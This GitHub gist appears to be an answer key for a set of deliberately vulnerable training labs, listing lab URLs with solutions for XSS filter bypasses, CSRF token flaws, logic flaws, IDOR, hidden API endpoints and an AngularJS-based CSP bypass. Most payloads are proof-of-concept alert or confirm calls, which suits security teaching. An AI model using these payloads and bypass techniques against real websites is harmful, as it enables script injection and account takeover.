Last active
September 21, 2021 22:08
-
-
Save The-XSS-Rat/aaab7e14cf2417a840502f1d57a97595 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Servers | |
| --------------------------- | |
| XSS | |
| --------------------------- | |
| http://23.239.9.22/cheeseBlog Basic stored XSS on homepage | |
| Solution: | |
| http://23.239.9.22/cheeseBlog-1 Basic reflected XSS on search page | |
| Solution: | |
| http://23.239.9.22/cheeseBlog-2 filtered reflected XSS on search page | |
| Solution: <img src=x onmouseover=confirm()> | |
| http://23.239.9.22/cheeseBlog-3 html tag injection into input | |
| Solution: ' onmouseover=alert() ' | |
| http://23.239.9.22/cheeseBlog-4 almost everything except onclick is blocked | |
| Solution: <img src=x onclick=confirm()> | |
| chttp://23.239.9.22/heeseBlog-11 The first 10 characters, it filters < | |
| Solution: gdfhhgjhgjnhgjhgjghj<img src=x onclick=confirm()> | |
| http://23.239.9.22/cheeseBlog-12 This is really hard, there is a hidden input field on the category page. This is vulnerabile to attribute injection | |
| Solution: ' accesskey=X onclick=alert(1) ' in the title field | |
| Then you need to go to categories and press alt+shift+x | |
| You can only have this ONES on the page and it only works in FF. You can break all the code after it but people will start noticing. x=' | |
| http://23.239.9.22/cheeseBlog-13 | |
| You need to do directory brute forcing to find images.php | |
| There you need to enter the following attack vector; <img src=x onclick=confirm()> | |
| This is because alert is blocked | |
| http://23.239.9.22/cheeseBlog-14 | |
| A lot is filtered here | |
| - You need a nullbyte SOMEWHERE in the payload (%00) | |
| - No img tags BUT this is filtered BEFORE the lowercasing AND I am also filtering Img so you need to use iMg tag | |
| - it will convert the search query to lowercase string | |
| All of this is filtered AFTER toLowerCase | |
| - no SVG allowed | |
| - No scripts | |
| - No alert | |
| - No confirm | |
| http://23.239.9.22/cheeseBlog-14/search.php?q=fdsfniose0dffdsfsdffds%3CiMg%2500src%3Dx%2500onerror%3Dprompt%28%29%3E | |
| http://23.239.9.22/cheeseBlog-15 | |
| You will need double encoding here http://23.239.9.22/cheeseBlog-15/search.php?q=%25253cimg+src%3Dx%3E | |
| %25 url decodes into % | |
| %3c into < | |
| %3e in > | |
| http://23.239.9.22/xss-post/ | |
| <img src=x onclick=alert()>, onclick Is allowed, the rest not | |
| CSRF | |
| ------------------------------------ | |
| http://23.239.9.22/cheeseBlog-5 CSRF on admin field | |
| Solution: On the edit field in the admin there is a CSRF hidden field | |
| but the server never checks it, only if it's there | |
| http://23.239.9.22/cheeseBlog-7 CSRF on admin field | |
| Solution: On the edit field in the admin there is a CSRF hidden field | |
| but the server never even checks if it's there | |
| http://23.239.9.22/cheeseBlog-8 CSRF on admin field | |
| Solution: Should be safe | |
| http://23.239.9.22/cheeseBlog-9 CSRF on admin field | |
| Solution: On the edit field in the admin there is a CSRF hidden field | |
| but the server only checks if the token has the correct length | |
| http://23.239.9.22/cheeseBlog-10 CSRF on admin field op experimental page | |
| Solution: On the edit page in the admin section there is a hidden field refering to edit2.php; | |
| this page just checks if the CSRF token is set | |
| Logic flaws | |
| --------------------------- | |
| http://23.239.9.22/CheeseShop Basic logic flaw on ordering negative amount but only on cart page | |
| Solution: enter - amount on cart detail page | |
| http://23.239.9.22/CheeseShop-1 register with same username = account takeover | |
| Solution: Enter the same username as the admin user and your own email account and password | |
| http://23.239.9.22/CheeseShop-3 The password is never checked, you can use any password | |
| IDOR | |
| --------------------------- | |
| http://23.239.9.22/cheesems - There is an IDOR in edit.php | |
| http://23.239.9.22/cheesems-2 - There is a new name for the edit page and the link is always hidden | |
| http://23.239.9.22/cheesems-3 - Endpoints are in the js script | |
| User submissions | |
| ----------------- | |
| peskyRegex - @aspland_john | |
| http://23.239.9.22/peskyRegex/ | |
| rot13 - @aspland_john | |
| http://23.239.9.22/rot13/ | |
| sayHello - @aspland_john | |
| http://23.239.9.22/sayHello/ | |
| twistedConversion - @aspland_john | |
| http://23.239.9.22/twistedConversion/ | |
| base64 - @aspland_john | |
| http://23.239.9.22/base64/ | |
| PinkSink - @xhzeem | |
| http://23.239.9.22/PinkSink/ | |
| myEntity- @xhzeem | |
| http://23.239.9.22/myEntity/ | |
| 403Forbidden - @EnesSaltk7 | |
| http://23.239.9.22/403Forbidden/ | |
| recursive_nightmare - https://twitter.com/flex0geek | |
| http://23.239.9.22/recursive_nightmare/ | |
| API labs | |
| ----------------- | |
| Labs-5002 (Hidden id parameter) | |
| You need to guess that there an id parameters and it only shows 2 books but the hidden book is id=3 | |
| http://23.239.9.22:5002/api/v1/resources/books?id=3 | |
| Labs-5000 (Hidden endpoint on v1) | |
| http://23.239.9.22:5000/api/v2/resources/books/all | |
| Find the hidden admin interface on http://23.239.9.22:5000/api/v1/admin | |
| CSP Bypass | |
| ----------------- | |
| http://23.239.9.22/xss-post-csp/ | |
| Very easy, simply enter alert() because unsafe-inline and unsafe-eval are both enabled | |
| http://23.239.9.22/xss-post-csp2/ | |
| <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script> | |
| <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> | |
| Load angular from cloud flare domain | |
| Create an alert from anguler | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment